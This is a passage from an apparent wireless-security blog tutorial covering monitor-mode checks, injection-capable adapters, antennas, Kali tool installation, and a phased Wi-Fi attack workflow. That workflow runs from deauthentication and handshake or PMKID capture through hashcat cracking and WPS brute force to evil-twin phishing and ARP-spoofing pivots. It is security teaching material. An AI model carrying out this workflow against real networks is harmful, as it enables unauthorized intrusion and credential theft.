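            else:
                in_modes = False           # next section begins
    return phys

def monitor_capable(phys: dict) -> dict:
    """Which phys advertise monitor mode (a driver-level check only)."""
    return {phy: "monitor" in modes for phy, modes in phys.items()}

def live_check() -> dict:
    """Run the check on this machine (requires the iw package)."""
    out = subprocess.run(["iw", "list"], capture_output=True, text=True, check=True).stdout
    return monitor_capable(parse_iw_list(out))

# Constructed sample mimicking iw's layout: one laptop phy that lists no
# monitor mode and one external adapter phy that does.
SAMPLE_IW_LIST = """\
Wiphy phy0
\tmax # scan SSIDs: 20
\tSupported interface modes:
\t\t * managed
\t\t * AP
\t\t * P2P-client
\tBand 1:
\t\tCapabilities: 0x1ff
Wiphy phy1
\tmax # scan SSIDs: 4
\tSupported interface modes:
\t\t * IBSS
\t\t * managed
\t\t * AP
\t\t * monitor
\t\t * mesh point
\tsoftware interface modes (can always be added):
\t\t * AP/VLAN
\t\t * monitor
"""

if __name__ == "__main__":
    for phy, ok in monitor_capable(parse_iw_list(SAMPLE_IW_LIST)).items():
        print(f"{phy}: monitor mode {'supported' if ok else 'NOT supported'}")
```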

What Chipset to Look For

The wireless security community has thoroughly tested chipsets for monitor mode and injection reliability. The recommended chipsets, in order of community support:

Atheros AR9271: The single most reliable chipset for wireless security work on 2.4GHz. Supported by the ath9k_htc driver, which is built into the Linux kernel. No additional driver installation required on Kali Linux or any modern Ubuntu derivative. Monitor mode and injection work flawlessly out of the box. 2.4GHz only.

Realtek RTL8812AU: The go-to chipset for dual-band (2.4GHz + 5GHz) security work. Requires installation of the Aircrack-ng patched driver (88XXau), but this is straightforward on Kali. Once installed, full monitor mode and injection support on both bands.

Realtek RTL8814AU: Higher-powered version of the RTL8812AU. Four external antenna ports. Excellent for environments with weak signals or significant RF interference. Same driver as RTL8812AU.

MediaTek MT7612U: Good dual-band support on recent (5.x+) Linux kernels. Less community documentation than Realtek or Atheros options, but generally reliable.

Chipsets to avoid:

  • Intel (ax200, ax210, and family): No injection support
  • Broadcom BCM series: Notoriously poor Linux support, no injection
  • Realtek RTL8188 family: Limited injection support, frequently problematic

Recommended Adapters — The Field-Tested List

WIRELESS SECURITY ADAPTER COMPARISON
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Adapter              │ Chipset        │ Bands │ Max    │ Notes
                     │                │       │ Speed  │
─────────────────────┼────────────────┼───────┼────────┼─────────
Alfa AWUS036NHA      │ Atheros AR9271 │ 2.4G  │ 150M   │ Industry
                     │                │       │        │ standard.
                     │                │       │        │ Best for
                     │                │       │        │ WPA2 work
─────────────────────┼────────────────┼───────┼────────┼─────────
Alfa AWUS036ACH      │ Realtek        │ 2.4G  │ 1200M  │ Best dual-
                     │ RTL8812AU      │ + 5G  │        │ band option
─────────────────────┼────────────────┼───────┼────────┼─────────
Alfa AWUS1900        │ Realtek        │ 2.4G  │ 1900M  │ High power.
                     │ RTL8814AU      │ + 5G  │        │ 4 antennas.
─────────────────────┼────────────────┼───────┼────────┼─────────
Panda PAU09          │ Ralink RT5572  │ 2.4G  │  300M  │ Budget
                     │                │ + 5G  │        │ option.
─────────────────────┼────────────────┼───────┼────────┼─────────
TP-Link TL-WN722N    │ Atheros AR9271 │ 2.4G  │  150M  │ Cheap AR9271
(v1 ONLY)            │ (v1)           │       │        │ option.
                     │ RTL8188EUS(v2) │       │        │ WARNING: v2+
                     │                │       │        │ is different
                     │                │       │        │ chipset!
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
RECOMMENDATION BY USE CASE:
  Just starting out / budget conscious → Alfa AWUS036NHA (~$30-40)
  Need dual-band (5GHz targets) → Alfa AWUS036ACH (~$40-50)
  Professional / Red team use → Alfa AWUS1900 (~$60-80)
  Lab backup / secondary adapter → Panda PAU09 (~$20-25)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Important TP-Link TL-WN722N warning: Version 1 of this adapter uses the Atheros AR9271 chipset and is excellent for security work. Versions 2 and 3 use a completely different chipset (Realtek RTL8188EUS) with significantly worse injection support. The hardware looks identical. Check the box carefully; if you cannot verify that it is v1, avoid it.

Antennas — Extending Your Reach

The included antennas on most adapters are omnidirectional dipole antennas with 5dBi gain. They are adequate for lab work and most field assessments within normal operating range.

For extended range or targeted reconnaissance:

ANTENNA TYPES FOR WIRELESS SECURITY
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Type            │ Gain   │ Pattern         │ Best For
────────────────┼────────┼─────────────────┼─────────────────────
Dipole (stock)  │  5 dBi │ Omnidirectional │ Lab, close range
High-gain omni  │  9 dBi │ Omnidirectional │ General field work
Yagi            │ 14 dBi │ Narrow beam     │ Targeting specific
                │        │                 │ building or floor
Panel           │ 10 dBi │ Wide sector     │ Building coverage
Parabolic dish  │ 24 dBi │ Very narrow     │ Long-range attack
                │        │                 │ (km+ distances)
RANGE REALITY (clear line of sight, Alfa AWUS036NHA):
  5 dBi stock dipole: ~100-200m
  9 dBi high-gain:    ~300-500m
  24 dBi parabolic:   ~1-5 km
NOTE: All Alfa adapters use RP-SMA connectors. Ensure
any replacement antenna uses RP-SMA (not SMA).
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Setting Up Your Attack Environment

A quick reference for the Kali Linux setup needed to run the tools above:

# Update system
sudo apt update && sudo apt upgrade -y
# Install/update Aircrack-ng suite
sudo apt install aircrack-ng -y
# Install Hashcat
sudo apt install hashcat -y
# Install hcxpcapngtool for capture file conversion
sudo apt install hcxtools -y
# Install Bettercap
sudo apt install bettercap -y
# Install Reaver and Bully
sudo apt install reaver bully -y
# Install Wifite2
sudo apt install wifite -y
# Install Kismet
sudo apt install kismet -y
# For Alfa AWUS036ACH (RTL8812AU) — install driver
sudo apt install realtek-rtl88xxau-dkms -y
# Verify adapter detection
lsusb              # should show your adapter
iwconfig           # should show wlan0 or similar

The Complete Attacker's View — Putting It Together

Before we move to the live lab simulation in Part III, here is how every concept and tool fits together in a real wireless security assessment workflow:

COMPLETE WIRELESS ATTACK WORKFLOW
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
PHASE 1: RECONNAISSANCE (Passive — Zero Footprint)
──────────────────────────────────────────────────
Hardware:  Alfa adapter in monitor mode
Tools:     airodump-ng / Kismet
Captures:  All SSIDs, BSSIDs, channels, encryption types,
           client MACs, probe requests, WPS status
  → Identify target SSID and BSSID
  → Note: WPA2? WPA3? Open? WPS enabled?
  → Map all connected clients
PHASE 2: HANDSHAKE / DATA CAPTURE
──────────────────────────────────────────────────
Tools:     airodump-ng (targeted capture)
           aireplay-ng (deauth to trigger handshake)
Captures:  WPA2 four-way handshake
           or PMKID (no deauth needed)
  → Lock airodump-ng to target channel and BSSID
  → If client present: send deauth → capture handshake
  → If no client: use hcxdumptool for PMKID harvest
PHASE 3: OFFLINE CRACKING
──────────────────────────────────────────────────
Tools:     aircrack-ng (CPU, small wordlists)
           hashcat (GPU, large wordlists + rules)
           Wordlists: rockyou.txt, custom company lists
  → Dictionary attack with best64.rule
  → Targeted brute force if password pattern is known
PHASE 4: IF WPS ENABLED
──────────────────────────────────────────────────
Tools:     Reaver / Bully
  → PIN brute force regardless of password complexity
  → Retrieves WPA passphrase from PIN
PHASE 5: IF SOCIAL ENGINEERING IS IN SCOPE
──────────────────────────────────────────────────
Tools:     Fluxion
  → Evil Twin + captive portal
  → Defeats strong passwords by targeting human behavior
PHASE 6: POST-ACCESS EXPLOITATION
──────────────────────────────────────────────────
Tools:     Bettercap, nmap, Metasploit
  → ARP spoofing → MitM
  → Traffic interception
  → Internal network scan
  → Pivot to internal servers
  (Full coverage in Part III)
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Wrapping Up Part II

You now have the complete attacker's toolkit in your head.

You understand not just what each tool does, but why it works — what packets it sends, what it is listening for, and where in the protocol stack each attack operates. You understand the hardware requirements and why they exist. And you understand how all the pieces connect into a coherent workflow from passive reconnaissance to handshake capture to password cracking.

This is the difference between running tools and understanding tools.

In Part III, we take everything from Parts I and II and run it live. Step-by-step lab simulation of a WPA2 network compromise, with detailed explanations of what is happening internally at every step. Then we go further: what does an attacker actually do after they are on the network? ARP spoofing, DNS hijacking, session hijacking, internal scanning, and the path from Wi-Fi access to full corporate compromise. Plus: the movie myths your friends believe versus what actually happens, and how mobile hotspots fit into the threat picture.

If this helped you go from "I run tools" to "I understand tools" — share it. That's the whole point.

That's it for this blog. Go read Parts 1 and 2 again and make notes, because it's time for some attacks, all coming together in Part 3 and Part 4.

Comment your doubts, clap to show some love for our efforts and encourage us. See you.
